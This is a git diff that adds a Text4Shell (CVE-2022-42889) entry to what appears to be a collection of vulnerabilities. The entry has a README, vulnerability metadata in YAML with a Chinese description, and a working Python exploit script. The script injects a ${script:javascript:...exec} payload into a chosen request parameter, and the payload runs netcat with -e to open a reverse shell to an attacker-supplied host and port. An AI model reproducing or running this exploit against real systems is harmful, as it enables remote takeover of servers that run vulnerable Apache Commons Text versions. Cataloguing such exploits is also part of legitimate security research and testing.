diff --git a/cve/apache-commons-text/2022/CVE-2022-42889/README.md b/cve/apache-commons-text/2022/CVE-2022-42889/README.md
new file mode 100644
index 0000000000000000000000000000000000000000..3ddbbd0a1d3b4b6dbc5b68d508fdfbcce3df929e
--- /dev/null
+++ b/cve/apache-commons-text/2022/CVE-2022-42889/README.md
@@ -0,0 +1,2 @@
+# CVE-2022-42889-Text4Shell-Exploit-POC
+CVE-2022-42889 Text4Shell Exploit POC
diff --git a/cve/apache-commons-text/2022/CVE-2022-42889/text4shell_exploit.py b/cve/apache-commons-text/2022/CVE-2022-42889/text4shell_exploit.py
new file mode 100644
index 0000000000000000000000000000000000000000..a7776571b3b237180b5310da586da6953a8acc23
--- /dev/null
+++ b/cve/apache-commons-text/2022/CVE-2022-42889/text4shell_exploit.py
@@ -0,0 +1,20 @@
+import requests
+import sys
+
+if(len(sys.argv) != 6):
+        print("Usage: python3 exploit.py <URL> <PARAM_NAME> <LHOST> <LPORT> <SHELL_TYPE>")
+        sys.exit(0)
+
+URL = sys.argv[1]
+param_name = sys.argv[2]
+lhost = sys.argv[3]
+lport = sys.argv[4]
+type = sys.argv[5]
+
+cmd = "nc " + lhost + " " + lport + " -e " + type
+payload="${script:javascript:java.lang.Runtime.getRuntime().exec('" + cmd + "')}"
+
+PARAMS = {param_name:payload}
+
+r = requests.get(url = URL, params = PARAMS)
+print(r.text)
diff --git a/cve/apache-commons-text/2022/yaml/CVE-2022-42889.yaml b/cve/apache-commons-text/2022/yaml/CVE-2022-42889.yaml
new file mode 100644
index 0000000000000000000000000000000000000000..991427c4e1db623fab13bf03fd2c1b384bd8296b
--- /dev/null
+++ b/cve/apache-commons-text/2022/yaml/CVE-2022-42889.yaml
@@ -0,0 +1,20 @@
+id: CVE-2022-42889
+source: https://github.com/rhitikwadhvana/CVE-2022-42889-Text4Shell-Exploit-POC
+info:
+  name: Apache Commons Text项目实现了一系列关于文本字符串的算法，专注于处理字符串和文本块。
+  severity: CRITICAL
+  description:
+    Apache Commons Text 1.10.0版本之前允许对文本进行相关的变量解析。在Apache Commons Text版本1.5～1.9中，攻击者可构造恶意文本，由于不安全的插值默认值，当输入的参数不受信任时，可能导致远程代码执行。
+  scope-of-influence:
+    1.5 <= Apache Commons Text <= 1.9
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-42889
+    - https://zhuanlan.zhihu.com/p/575580463
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2022-42889
+    cwe-id: CWE-94
+    cnvd-id: None
+    kve-id: None
+  tags: CVE-2022, Apache Commons Text
\ No newline at end of file
diff --git a/other_list.yaml b/other_list.yaml
index bab8348fc38e126c13b33e5b542674e8498cb62a..5b5909a9fccc7ce9e8b2b7b246d51c96a9a8a0cd 100644
--- a/other_list.yaml
+++ b/other_list.yaml
@@ -23,6 +23,8 @@ cve:
     - CVE-2021-1056
   java-spring-cloud-gateway:
     - CVE-2022-22947
+  apache-commons-text:
+    - CVE-2022-42889
   unzip:
     - CVE-2022-0529
 cnvd: